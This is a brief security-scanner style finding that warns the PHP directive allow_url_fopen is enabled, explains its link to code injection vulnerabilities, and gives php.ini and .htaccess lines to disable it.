PHP allow_url_fopen enabled

Description
  • The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval from remote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering. <br/><br/>allow_url_fopen is enabled by default.
Remediation
  • You can disable allow_url_fopen from either php.ini (for PHP versions newer than 4.3.4) or .htaccess (for PHP versions up to 4.3.4). <br/><br/> <strong>php.ini</strong><br/> allow_url_fopen = 'off'<br/><br/> <strong>.htaccess</strong><br/> php_flag allow_url_fopen off<br/>
References